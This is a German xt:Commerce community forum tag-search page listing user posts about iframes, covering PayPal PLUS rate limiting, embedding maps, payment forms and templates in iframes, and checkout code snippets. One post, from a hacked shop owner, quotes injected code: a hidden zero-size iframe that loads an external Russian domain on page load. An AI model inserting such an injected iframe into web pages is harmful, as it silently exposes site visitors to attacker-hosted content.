Jump to content
xt:Commerce Community Forum

Search the Community

Showing results for tags 'iframe'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • xt:Commerce - Professionelle eCommerce Shopsoftware
    • Fragen zur Software
    • xt:Commerce Plugins
    • xt:Commerce 4 Sprachen
    • xt:Commerce Online Handbuch
    • Häufige Fragen (FAQ)
    • Fragen zur Software (Pre Sale)
    • Anleitungen - Patches - Downloads
  • xt:Commerce Office - Shop & Warenwirtschaft
    • Allgemeine Fragen
  • xt:Commerce Allgemein
  • xt:Commerce 3 Shopsoftware Community Area (nur Lesen)
    • Allgemeine Diskussionen
    • Installation und Konfiguration
    • Shopbereich
    • Admininterface
    • Modul Entwicklung
    • Template System
    • xt:Commerce Schnittstellen ERP Systeme
    • PHP & MysQL Forum
    • HTML & CSS

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


ICQ


Yahoo


Jabber


Skype


Location


Interests


Biografie


Wohnort


Interessen


Beruf

Found 19 results

  1. Hallo Community, wir haben leider seit längerer Zeit Probleme mit dem PayPal PLUS Plugin. Vielleicht weiß ja hier jemand Rat. Der PayPal PLUS iFrame wird jeden Tag desöfteren geblockt. Ursache sind "too many requests" laut ErrorLog. Dort heißt es dann: {"name":"RATE_LIMIT_REACHED","debug_id":"8f14f413d0f64","message":"Too many requests. Blocked due to rate limiting."}) Wir nutzen xtCommerce 4.2 und PayPal PLUS 1.4.5 (PayPal 2.7.4 ist als Fallback aktiviert). An welcher Stelle werden denn die Requests im Code vereinbart? Kann man das irgendwie prüfen? Laut PP Support werden zuviele Requests gesendet, allerdings zu wenige Executes durchgeführt. Aber ich hab leider keine Ahnung wo man das beeinflussen kann? Wir haben seit kurzem ein komplett neues Template, aber der Fehler blieb bestehen. Kann man das ganze vll. mit den Webhooks 'abhören' an welcher Stelle die Requests gesendet werden? Wir wissen da leider nicht mehr weiter, die Plugins wurden auch schon komplett gelöscht und neu installiert. Außerdem haben wir auch mal eine neue App in der REST Api angelegt mit neuer ID und Secret ID. Hilft alles nix. Ich hoffe hier hat eventuell jemand eine Idee die weiterhilft.
  2. Hallo Leute, ich hab eversucht über dier Google Maps-Seite ein iFrame über den Contentmanager einzubinden. Das klappt nicht, die Änderungen werden einfach nicht übernommen(wenn ich den Content nach dem speicher öffne is alles wieder weg). Vielleicht hatte ja schonmal juemand das gleiche Problem und kann mir weiter helfen....oder einer der 'Alten Hase' weis eine Lösung dazu... lg Notexx
  3. Hallo Leute, ich habe mal wieder ein kleines problem. Moneybooker + iFrame Shop mit Moneybookers/Skrill läuft und ist auch stabil. Jedoch wird beim bezahlen Moneybookers immer in einem neuen Fenster geladen. ich würde es aber gern im iFrame laden - dies sollte ja irgenwie funktionieren Veyton 4.0.14 Moneybookers: 1.0.1 für ideen und hinweise danke ich euch schon mal - mfg Rene
  4. Hallo, könnte mir vielleicht bitte Jemand sagen wie ich meine Cross Selling Module (cross_selling.html und reverse_cross_selling.html) per IFrame in meine product_info_v1.html einbinden kann? Ich habe dies folgendermaßen versucht: <iframe name="cross_selling" src="{$tpl_path}module/cross_selling.html" width="600" height="200" scrolling="no" frameborder="0"></iframe Nur leider wird mir dann der Code aus cross_selling.html dargestellt ohne geparsed zu werden. Ich bekomme also nicht die Produkte sondern lediglich den Code Inhalt des HTML Documents zu sehen?! Also nicht ganz das was ich wollte. :cry: Es wäre sehr nett wenn mir Jemand bitte sagen könnte wie ich die Einbindung anzustellen habe damit sie auch richtig prozessiert wird. Danke! Grüsse, Nicole
  5. Liebes Forum, Folgendes Problem: ich habe im Backend einen neuen Menüpunkt hinzugefügt, also die Tbl xt_acl_nav und dazu einen Menü Unterpunkt. Dieser Untermenü Punkt soll nicht adminHandler.php aufrufen sondern ein File das im Pluginordner liegt, also habe ich in das Feld url_d folgendes eingetragen: ../plugin/nameplg/start.php Diese Datei beinhaltet einen Iframe wo ich das benötigte File aufrufe. (laut Doku: Wird die Zieldatei angegeben die aufgerufen wird ...) Aber er gibt mir immer ein 403 Forbidden, You do not have permission to access this document zurück. Weiss hier jemand wie ich das hinbekomme? Vielleicht steh ich momentan auch nur auf der Leitung danke im voraus
  6. Hallo mein Shop wurde gehackt. der Sicherheitspath vom 20.11.2008 3.0.4 für Sp2.1 ist drauf Ich habe bereist die Dateien offline per Antivir / Mailwarebytes geprüft kein Ergebnis. Folenden EIntrag <iframe frameborder="0" onload="if (!this.src){ this.src='http://intelq.ru:8080/index.php'; this.height='0'; this.width='0';}" >crrdwrlcjyvsznsvjhigsarreeiqghb</iframe> wer kann mir weiterhelfen. Gruß Matthias
  7. Hi, ich habe folgendes vor: ...ich möchte einen Videoplayer auf der Startseite haben, inkl. Playlist, in der Videos der Artikel von der Startseite verlinkt sind. Den jqeuery Media Player habe ich schon in die Produkt-Detail-Seiten integriert. Mit ihm spiele ich Videos ab, die ich dem Produkt als Download zugeordnet habe. Fragen: 1. Wie kann ich das am besten/schlausten/einfachsten erreichen?! 2. Kann ich direkt in dem jquery Player eine Playlist erstellen? Wie wird die dann mit den Daten gefüttert? ...wenn das nicht funktioniert.... 3. Wie kann ich ein Iframe auf der Startseite aufrufen und in dem Frame eine beliebige Seite (Player) darstellen? ...oder muss ich dafür einen ContenBlock anlegen? (aber wie? mit der Anweisung aus dem Handbuch klappt's nicht) Hat vielleicht irgendjemand einen Rat, wie ich diese Aufgabe lösen kann?! Ich hoffe auf eure Unterstützung! Wäre sehr dankbar über jede kleine Hilfe!# Gruß Beni
  8. Hallo, ich bastel gerade an einem Plugin für das Zahlungsportal Payone. Funktioniert auch schon fein, würde aber gerne den Zahlungsprozess (Eingabe der Kreditkartendaten o.ä. über das Payone Frontend) in einem iFrame innerhalb des Shops abbilden. In xtCore/pages/checkout.php finde ich dazu eigentlich folgenden Code: /** * if payment module is for external PSP with iframe solution */ if ($payment_module_data->iframe == true) { $_pspurl = $payment_module_data->IFRAME_URL; $xtLink->_redirect($_pspurl); break; } [/PHP] Es wird also auch "nur" ein redirect aufgerufen, oder? Kann es sein, dass diese iframe Funktion noch nicht unterstützt wird?
  9. Hallo, folgende Idee... Ich möchte in der checkout_confirmation.php die Anzeige des Widerrufes in einem iframe einbinden, damit nicht der ganze lange Text angezeigt wird. Ferner hat das dann auch zum Vorteil, das mein Kreditkartenmodul nicht auf den Widerrufstext angezeigt, sprich darüber gelegt wird. Zur Zeit ist der Widerruf in der checkout_confirmation.php ausgeschaltet. Wie kann ich iframe an besten einbinden? Hier der Code wie er momentan ist: //heidelpay if (substr($payment_modules->selected_module,0,9) == 'heidelpay' && $payment_modules->selected_module != 'heidelpaypp') { $HEIDELPAY_CALL_FORM = true; $smarty->assign('CHECKOUT_BUTTON', "</form>" . $payment_modules->payment_action()); }else $smarty->assign('CHECKOUT_BUTTON', xtc_image_submit('button_confirm_order.gif', IMAGE_BUTTON_CONFIRM_ORDER) . '</form>' . "\n"); ////heidelpay //check if display conditions on checkout page is true if (DISPLAY_REVOCATION_ON_CHECKOUT == 'false') { if (GROUP_CHECK == 'true') { $group_check = "and group_ids LIKE '%c_" . $_SESSION['customers_status']['customers_status_id'] . "_group%'"; } $shop_content_query = "SELECT content_title, content_heading, content_text, content_file FROM " . TABLE_CONTENT_MANAGER . " WHERE content_group='" . REVOCATION_ID . "' " . $group_check . " AND languages_id='" . $_SESSION['languages_id'] . "'"; $shop_content_query = xtc_db_query($shop_content_query); $shop_content_data = xtc_db_fetch_array($shop_content_query); if ($shop_content_data['content_file'] != '') { ob_start(); if (strpos($shop_content_data['content_file'], '.txt')) echo '<pre>'; include (DIR_FS_CATALOG . 'media/content/' . $shop_content_data['content_file']); if (strpos($shop_content_data['content_file'], '.txt')) echo '</pre>'; $revocation = ob_get_contents(); ob_end_clean(); } else { $revocation = $shop_content_data['content_text']; } $smarty->assign('REVOCATION', $revocation); $smarty->assign('REVOCATION_TITLE', $shop_content_data['content_heading']); $smarty->assign('REVOCATION_LINK', $main->getContentLink(REVOCATION_ID, MORE_INFO)); $shop_content_query = "SELECT content_title, content_heading, content_text, content_file FROM " . TABLE_CONTENT_MANAGER . " WHERE content_group='3' " . $group_check . " AND languages_id='" . $_SESSION['languages_id'] . "'"; $shop_content_query = xtc_db_query($shop_content_query); $shop_content_data = xtc_db_fetch_array($shop_content_query); $smarty->assign('AGB_TITLE', $shop_content_data['content_heading']); $smarty->assign('AGB_LINK', $main->getContentLink(3, MORE_INFO)); } $smarty->assign('language', $_SESSION['language']); $smarty->assign('PAYMENT_BLOCK', $payment_block); $smarty->caching = 0; $main_content = $smarty->fetch(CURRENT_TEMPLATE . '/module/checkout_confirmation.html'); $smarty->assign('language', $_SESSION['language']); $smarty->assign('main_content', $main_content); $smarty->caching = 0; if (!defined(RM)) $smarty->load_filter('output', 'note'); $smarty->display(CURRENT_TEMPLATE . '/index.html'); include ('includes/application_bottom.php'); ?> LG
  10. Hallo, ich habe folgendes Problem: Ich benutzte DW zum Erstellen von seiten und meine kenntnisse sind nicht grad der hammer. Nun habe ich den Shop auf einer Seite als Iframe eingebunden welches auf den ersten Blick ja ganz nett aussieht aber viele Nachteile birgt. zb: die höhe vom iframe passt sich nicht an den inhalt an sodas ich, wenn mal mehr text kommt, zwei scrollbalken habe und wenn ich über suchmaschinen zur seite gelange nur der Shop kommt... usw.... gibts da ne möglichkeit in den index das design über DW in html einzufügen od. hat jemand ne lösung das der Iframe sich nach dem Inhalt anpasst? Od. gibts da noch was was ich nicht weiß um das design einfach so wie hier: http://www.kleider-schrank.at/test/eshop in den index einzubauen.... danke mal im voraus... lg
  11. ich versuche seit stunden ein menu per iframe einzubauen. soweit geht auch alles, aber wenn ich auf ein menubutton drücke, wird das template zerrupft. bei den anderen menues die nur html und css basiert sind, war das kein problem woran liegt es www.goods4less.de
  12. hallo liebe freunde. Problembeschreibung: im XtCommerce Template ist der Folgende Platzhalter {$PRODUCTS_URL} ein Link zugewiesen, dass den Hersteller "Anlinkt". jenachdem was man da einträgt.. ob siemens.de oder sonstwas... da aber wir inzwischen unsere Daten via CSV bekommen und keine Produktpflege machen müssen, bietet sich die möglichkeit des fertig Content an! DCI, CNET, IT-Scope usw... kennen einige bestimmt von euch! das fertige beispiel sieht so aus: Link Allerdings benutzt dieser Herr einen Joomla CMS mit einem Virtuemart. (modifizierte Version) Da wurde in der Datenbank eine zusätzliche Spalte erstellt, wo der Produktlink (DCI) Extern als Iframe eingebunden wird. diese möglichkeit ist natürlich die einfachste. Da wir aber: 1. XT Commerce benutzen. 2. eine Warenwirtschaft haben 3. keine Ummodifikation am System selbst haben wollen (Update Fähigkeit) 4. Einige Produkte werden Manuell von uns erstellt und reingestellt (in der Lokalen Datenbank) haben wir uns entschlossen diesen Problem anderweitig zu lösen. und zwar die Veränderung im Template selbst! wir haben product_info_V1.html und product_info_V2.html erstellt.. demnächst soll die V2 mit den Folgendenen Modifikationen erstellt werden: {$PRODUCTS_URL} soll abgefangen werden und als IFrame in die {$PRODUCTS_DESCRIPTION} eingefügt werden. allerdings kommt die {$PRODUCTS_DESCRIPTION} aus der Lokalen Datenbank. und die {$PRODUCTS_URL} ist ein Externer Link der so aussieht: (Bitte anschauen!) cds Produkt DatenBlatt dieser link muss Also in die product_url rein und als Iframe die Daten holen und sie als {$products_description} anzeigen lassen.. hat jemand von euch eine Idee wie man das machen könnte? Jetzt fragt ihr euch WARUM als product_URL ???? ganz einfach... wir bekommen die Daten via CSV, und dort sind die DCI Links unter p_url.de abgelegt!! somit legen wir keine neue Spalte in der DB sondern nutzen die bereits vorhandene aus und lassen sie anders angezeigt bekommen!
  13. Hallo. Ich bin dabei ein eigenes Template für xt:c v3 zu bauen und würde jetzt gerne den {$main_content} in einem iFrame darstellen. Also die ganzen Boxen außenherum und in der Mitte eben dieses iFrame. Der Shop soll an die Fenstergröße angepasst sein. Ich komme damit kaum voran. Wahrscheinlich ist es aber gar nicht so schwer und ich verdenke und verrenke mich nur. Vielleicht könnt ihr mir ja helfen. Ich danke für eure Antworten schon einmal im voraus und bitte darum, hier keine Diskussion über DIVs und die Vorteile von CSS gegenüber dem iFrame zu starten. Ich habe es bewusst gewählt. Gruß, Andreas
  14. Eine kurze Frage an Euch ... eigentlich soll doch der Hinweis auf die Software bei den kostenlos Versionen erhalten bleiben - finde ich auch in Ordnung (arbeite an einem anderen Opensource CMS Projekt mit) und sinnvoll. Eine Installation des Shops w?rde ich gerne in einem iFrame innerhalb eines CMS ?ffnen. Da w?re es "unschick" diese Info dort zu belassen - ich w?rde sie gerne entfernen und auf die Hauptseite "verpflanzen" und darunter auch den Hinweis auf unser CMS einf?gen. Wenn es klappt und der Kunde das Projekt haben will - k?nnte man auch ?ber eine Spende nachdenken ;-), denn xt-commerce ist genial f?r einen kleinen Shopbetreiber. Gruss Micha
  15. hi ich versuche nun schon seit ner stunde die breite des agb kastens anzupassen... geht aber nicht... ich gehe in die checkout_payment.php... da seht dann : $conditions= '<iframe SRC="'.DIR_WS_CATALOG.'media/content/'.$shop_content_data['content_file'].'" width="100%" height="300">'; $conditions.= '</iframe>'; dann ?ndere ich den berieich : width="100%" height="300" in width="100%" height="150".. also dass da dann steht : $conditions= '<iframe SRC="'.DIR_WS_CATALOG.'media/content/'.$shop_content_data['content_file'].'" width="100%" height="150">'; $conditions.= '</iframe>'; aber meine agbs werden einfach nicht kleiner..... :wall: w?r echt ?ber jegliche hilfe dankbar... lg flo
  16. Hallo, liebe xtc-Gemeinde, sicher haben viele von Ihnen auch ein Portal, sodass Sie sicher wissen, was ich meine... Locale Testapplikation: http://localhost/n55vkp-prox/modules.php?name=xt1 der shop liegt hier: http://localhost/os_xt1/ :wall: Wie m?sste man den Nukelink schreiben, damit im Modul z.B. die product-info.php eines speziellen Produkts angezeigt wird?
  17. stut

    Iframe

    Hallo xt gemeinde m?chte meinen content als iframe darstellen lassen! nur leider fehlt mir das wissen um so etwas zu machen! kann mir jemand helfen bzw. mir sagen welche dateien angesprochen werden m?ssen damit $main_content im iframe erscheint habe die index.html schon umgebaut jedoche zeigt er mir alles an nur die seite im iframe nicht dort steht: "Sie haben keine oder ungen?gende Zugriffsrechte bitte bearbeiten Sie diese mit Ihrem FTP Programm". wie muss ich genau vorgehen um $main_content im iframe darzustellen w?re dankbar wenn mir jemand helfen k?nnte!! bin leider noch ein neuling !! mfg stut
  18. hey, ich habe in einem fr?heren posting gelesen, dass man andere programme im shop per iframe anzeigen lassen kann: z.B. ein forum oder ?hnliches. wie funktioniert das bzw. weiss jemand wo ich das nachlesen kann? bin f?r jede info dankbar :rock:
×
×
  • Create New...